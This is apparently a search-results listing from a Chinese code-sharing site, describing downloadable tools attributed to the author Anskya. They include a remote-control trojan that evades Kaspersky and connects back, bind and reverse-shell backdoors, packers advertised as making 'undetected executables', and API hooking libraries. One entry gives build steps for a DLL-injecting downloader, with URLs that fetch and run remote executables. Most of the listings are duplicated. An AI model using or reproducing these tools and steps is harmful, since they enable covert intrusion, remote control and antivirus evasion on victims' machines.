Location:
Search - Anskya
Search list
Description: RT32 of Delphi by Anskya -RT32 of Delphi by Anskya
Platform: |
Size: 5430 |
Author: wewewe |
Hits:
Description: 代码编写:Anskya 简要的一款远程控制,FSG压缩后只有12k 下个版本将完全采用ASM+C编写,体积在5k左右使用bingle前辈的 创建SvcHost.exe调用的服务原理与实践使用的是和小榕前辈的BITS后门的一个替换技术.这里向两位前辈表示感谢,代码在编写过程中.得到一步江湖和sforever两位朋友的帮助(特别感谢sforever,没有逆向他的那个后门程序接口偶也不会发现一个BUG.)程序可以在卡巴斯基默认设置下,开机自启动和穿墙...反向连接,暂时只支持DNS和IP 由于身体上的等等原因还有其他一些外界因素.程序写的比较仓促初步写了几个功能,暂时大家试用一下好了.纯属练手 1.进程管理:查看,干掉.选定的进程 2.文件管理:上传,下载,新建目录,删除目录,删除文件等功能... 3.提供远程下载者功能:您可以选择下载并运行您的程序 4.提供卸载功能
Platform: |
Size: 404919 |
Author: 吴建 |
Hits:
Description: Delphi Tiny_Shell 3k (普通版本+端口复用穿防火墙)
Tiny_Shell 0.1 (普通版本)By Anskya
某天精神好了一点的时候写的,使用KOL+删除多余资源+清除PE重定位表+FSG压缩体积只有3k.
感谢那些提供Code和教程的GG and JJ们~~ ^_^~部分代码直接翻译C的shell
Tiny_Shell.dpr 工程时最简单的shell采用匿名单管道设计,本来打算不用管道直接写的,但是怕连目录都无法显示所以还是用了单管道,有个BUG-很明显的那种-就是,输入命令看不见但是可以运行,有兴趣自己改成双管道就可以了(如果不怕自己麻烦部使用管道直接将Socks获取的信息直接写入进程,也可以返回数据的^_^).
Platform: |
Size: 13285 |
Author: byongs |
Hits:
Description: Hook Api Library 0.2 [Ring0&3] By Anskya
Email:Anskya@Gmail.com
ring3 inline hook For Api
Thank:
前29A高手也一直都是我的偶像...z0mbie大牛...这里膜拜一下
使用的LDE32引擎是翻译他老人家的...C->Delphi...
说明:
1.利用堆栈跳转
没有使用传统的jmp xxxx 长跳转,使用容易理解的push xxxx+ret
仔细看代码容易理解...封装完好.
2.内存补丁结构:
补丁1:|push xxx--钩子处理过程|ret|
补丁2:|保存原始补丁地址|保存原始地址代码长度|原始地址的代码|push xxxxxx|ret|
更新说明:
0.2:
支持Ring0 Inline Hook
0.1:
Ring3 Inline Hook
Platform: |
Size: 6347 |
Author: david |
Hits:
Description: RT32 of Delphi by Anskya -RT32 of Delphi by Anskya
Platform: |
Size: 5120 |
Author: wewewe |
Hits:
Description: 代码编写:Anskya 简要的一款远程控制,FSG压缩后只有12k 下个版本将完全采用ASM+C编写,体积在5k左右使用bingle前辈的 创建SvcHost.exe调用的服务原理与实践使用的是和小榕前辈的BITS后门的一个替换技术.这里向两位前辈表示感谢,代码在编写过程中.得到一步江湖和sforever两位朋友的帮助(特别感谢sforever,没有逆向他的那个后门程序接口偶也不会发现一个BUG.)程序可以在卡巴斯基默认设置下,开机自启动和穿墙...反向连接,暂时只支持DNS和IP 由于身体上的等等原因还有其他一些外界因素.程序写的比较仓促初步写了几个功能,暂时大家试用一下好了.纯属练手 1.进程管理:查看,干掉.选定的进程 2.文件管理:上传,下载,新建目录,删除目录,删除文件等功能... 3.提供远程下载者功能:您可以选择下载并运行您的程序 4.提供卸载功能
-err
Platform: |
Size: 404480 |
Author: 吴建 |
Hits:
Description: Delphi Tiny_Shell 3k (普通版本+端口复用穿防火墙)
Tiny_Shell 0.1 (普通版本)By Anskya
某天精神好了一点的时候写的,使用KOL+删除多余资源+清除PE重定位表+FSG压缩体积只有3k.
感谢那些提供Code和教程的GG and JJ们~~ ^_^~部分代码直接翻译C的shell
Tiny_Shell.dpr 工程时最简单的shell采用匿名单管道设计,本来打算不用管道直接写的,但是怕连目录都无法显示所以还是用了单管道,有个BUG-很明显的那种-就是,输入命令看不见但是可以运行,有兴趣自己改成双管道就可以了(如果不怕自己麻烦部使用管道直接将Socks获取的信息直接写入进程,也可以返回数据的^_^).
Platform: |
Size: 13312 |
Author: byongs |
Hits:
Description: Hook Api Library 0.2 [Ring0&3] By Anskya
Email:Anskya@Gmail.com
ring3 inline hook For Api
Thank:
前29A高手也一直都是我的偶像...z0mbie大牛...这里膜拜一下
使用的LDE32引擎是翻译他老人家的...C->Delphi...
说明:
1.利用堆栈跳转
没有使用传统的jmp xxxx 长跳转,使用容易理解的push xxxx+ret
仔细看代码容易理解...封装完好.
2.内存补丁结构:
补丁1:|push xxx--钩子处理过程|ret|
补丁2:|保存原始补丁地址|保存原始地址代码长度|原始地址的代码|push xxxxxx|ret|
更新说明:
0.2:
支持Ring0 Inline Hook
0.1:
Ring3 Inline Hook
-Hook Api Library 0.2 [Ring0
Platform: |
Size: 6144 |
Author: david |
Hits:
Description: Anskya Polymorphic Packer V 1.3
Code By Anskya Thank:Aphex,Madshi,Gregory,~LOM~
Big Thank:Aphex,sforever,zxxfox,AngleAngel
GST Http://www.Godexp.com
Web Http://www.Anskya.net
Explanation:
Produce and encrypt the key with grade, the additional data are measured
the file protect of PE is compressed.-Anskya Polymorphic Packer V 1.3Code By Anskya Thank: Aphex, Madshi, Gregory, ~ LOM ~ Big Thank: Aphex, sforever, zxxfox, AngleAngelGST Http:// www.Godexp.comWeb Http:// www.Anskya.netExplanation:Produce and encrypt the key with grade, the additional data are measuredthe file protect of PE is compressed.
Platform: |
Size: 505856 |
Author: jackson |
Hits:
Description: Anskya NTPacker Generator For:NT,2K,Xp,2K3,LH V1.0
Written By Anskya[GST]
Email:Anskya@Gmail.com
QQ:115447[小零]
GST Web:Www.GodExp.Com
My Web:Www.Anskya.Net
Thank:Aphex,x140d4n,[God Security Team] And You!
[
This program creates undetected executables that only run
on Windows NT, 2000, XP, 2003 and LongHorn.
]
Command Line:Command Line:Generator -s <File Path>
Example:
cmd:C:\Generator -s test.exe
cmd:FSG.exe test.exe
Stub.exe File Size:8k[NoPack]
{
数据采用资源保护.程序加壳后~可以使用别的加壳软件保护
(FSG,UPX,,PESpin,ASPr等等都可以几乎支持任何加壳软件,
当然你也可以在Stub代码中使用加壳软件的SDK来增强效果)
这个代码只是为了演示EXE内存运行,不支持系统服务程序和DLL
可以按照自己要求修改。。
}-Anskya NTPacker Generator For: NT, 2K, Xp, 2K3, LH V1.0 Written By Anskya [GST] Email: Anskya@Gmail.com QQ: 115447 [small zero] GST Web: Www.GodExp.Com My Web: Www. Anskya.Net Thank: Aphex, x140d4n, [God Security Team] And You! [This program creates undetected executables that only run on Windows NT, 2000, XP, 2003 and LongHorn.] Command Line: Command Line: Generator-s <File Path> Example: cmd: C: \ Generator-s test.exe cmd: FSG.exe test.exe Stub.exe File Size: 8k [NoPack] (data resource protection.加壳procedures after ~ can use other software to protect加壳(FSG, UPX,, PESpin, ASPr and so on can be加壳supports almost any software, of course, you can use at Stub code加壳software SDK to enhance the effect) of this code is only for demo EXE memory to run, do not support the system Service procedures and DLL can be modified according to their own requirements. . )
Platform: |
Size: 52224 |
Author: 许凤 |
Hits:
Description: 编译说明:{
程序采用DLL插入--9x 和NT下都可以插入
穿防火墙,可以自定义三条连接
后面两个还可以休眠5秒后运行--具体看代码
程序编译压缩后只有2.7k
}
首先打开dlldownloader.asm文件~
url1s byte http://www.Anskya.Net/1.exe , 0
url2s byte http://www.Anskya.Net/2.exe , 0
url3s byte http://www.Anskya.Net/2.exe , 0
修改以上三个连接
exe1s byte heart1.exe , 0
exe2s byte heart2.exe , 0
exe3s byte heart3.exe , 0
这三个是保存的文件名--只需要填写文件名就可以了~~文件默认保存在临时文件目录
然后保存代码运行makeDLL.bat
然后直接运行makeEXE.bat
如果需要修改插入进程的话~修改
szExplorer byte Shell_TrayWnd , 0
中的类名----例如 QQ的窗口类名就是#32770
修改好以后就可以保存了~
然后运行makeEXE.bat就可以编译出来了
差点忘记~一定要装MASM32哦~~最好是V8.2-Compile Description: (sorry too lazy to paint Synthesizer)
(
Procedure used DLL insertion- 9x and NT can be inserted under all
Wear a firewall, you can customize the three connections
The latter two can also be sleep after 5 seconds to run- specifically look at the code
Program compiled compressed only 2.7k
)
First, open the file ~ dlldownloader.asm
url1s byte http://www.Anskya.Net/1.exe , 0
url2s byte http://www.Anskya.Net/2.exe , 0
url3s byte http://www.Anskya.Net/2.exe , 0
Modify the above three connections
exe1s byte heart1.exe , 0
exe2s byte heart2.exe , 0
exe3s byte heart3.exe , 0
These three are saved in the file name- just need to fill in the file name can be a ~ ~ the file by default saved in the temporary file directory
And then save the code to run makeDLL.bat
And then run directly makeEXE.bat
If you need to modify the insertion process, if ~ changes
szExplorer byte Shell_TrayWnd , 0
For example, the class name---- QQ
Platform: |
Size: 29696 |
Author: 张启航 |
Hits:
Description: Tiny_Shell 0.1 (普通版本)By Anskya
某天精神好了一点的时候写的,使用KOL+删除多余资源+清除PE重定位表+FSG压缩体积只有3k.
感谢那些提供Code和教程的GG and JJ们~~ ^_^~部分代码直接翻译C的shell
Tiny_Shell.dpr 工程时最简单的shell采用匿名单管道设计,本来打算不用管道直接写的,但是怕连目录都无法显示所以还是用了单管道,有个BUG-很明显的那种-就是,输入命令看不见但是可以运行,有兴趣自己改成双管道就可以了(如果不怕自己麻烦部使用管道直接将Socks获取的信息直接写入进程,也可以返回数据的^_^).
最好不要这样作很麻烦的说。身体不好要睡觉了,就不多写了.
Tiny_Shell2 0.1(端口绑定版本)By Anskya
Tiny_Shell2.dpr 从0.1普通版修改的~只修改一点点Code~呵呵懒得写代码
端口绑定原理是从C的shellcode Debug出来的^_^
默认是绑定80端口(如果没有找到这个端口就自己创建80端口。。。。),IP约束中的IP是为了防止任何人都连接上shell,这个地方可以改进一下,这个仅仅是演示版~要与实际开发结合还有好多问题存在。
-Tiny_Shell 0.1 (normal version) By Anskya
One day a little better when the spirit of writing, using KOL+ delete the extra resources to clear the PE re-positioning table++ FSG compressed size of only 3k.
Grateful to those that provide Code and tutorials for GG and JJ were ~ ~ ^ _ ^ ~ part of the code is a direct translation of C-shell
Tiny_Shell.dpr works most simple shell use of anonymous single-piping design, originally intended to write without the direct channels, but the fear of even directories can not be displayed so it is still using a single pipe, there s the kind of BUG-obvious- that is, enter command can not see but can run, are interested in their own dual-channel can be changed to the (if not afraid of their own troubles piped directly to the Socks department obtained information directly into the process, but also can return the data ^_^).
Best not to do so cumbersome to say. Poor health and going to sleep, no more writing.
Tiny_Shell2 0.1 (port bound versi
Platform: |
Size: 19456 |
Author: dangyujia |
Hits:
Description: 写ShellCode的时候写的~C版本代码~~没用就丢出来了~
CODE:
/*
1k(程序体积1kb) 反向连接,零管道后门 By Anskya
说明:
不用我多说了吧..黑客一般都会使用的后门程序..
这里只是简单的演示一下..没有添加进程隐藏功能
程序可以在Win9x,Win2k,WinXP,Win2k3上使用
程序体积只有1k(FSG压缩一下会更小)
测试:
本地开启NetCat等工具,监听80端口,会返回一个Shell
-shell
Platform: |
Size: 1024 |
Author: du8899 |
Hits:
Description: Spirit4.Uploader.B1 Coder:Anskya
Platform: |
Size: 6144 |
Author: 张鹏 |
Hits:
Description: Tiny_Shell2 0.1(端口绑定版本)By Anskya
Tiny_Shell2.dpr 从0.1普通版修改的~只修改一点点Code~呵呵懒得写代码
端口绑定原理是从C的shellcode Debug出来的^_^
默认是绑定80端口(如果没有找到这个端口就自己创建80端口。。。。),IP约束中的IP是为了防止任何人都连接上shell,这个地方可以改进一下,这个仅仅是演示版~要与实际开发结合还有好多问题存在。
Platform: |
Size: 19456 |
Author: star15321 |
Hits:
Description: {
Ring3 Hook api Demo By Anskya
Email: Anskya@Gmail.com
www.delphibasics.co.nr
//In this example, the phrase "Hello World" is checked and changed to "Goodbye World"
}-{
Ring3 Hook api Demo By Anskya
Email: Anskya@Gmail.com
www.delphibasics.co.nr
//In this example, the phrase "Hello World" is checked and changed to "Goodbye World"
}
Platform: |
Size: 5120 |
Author: Diego |
Hits: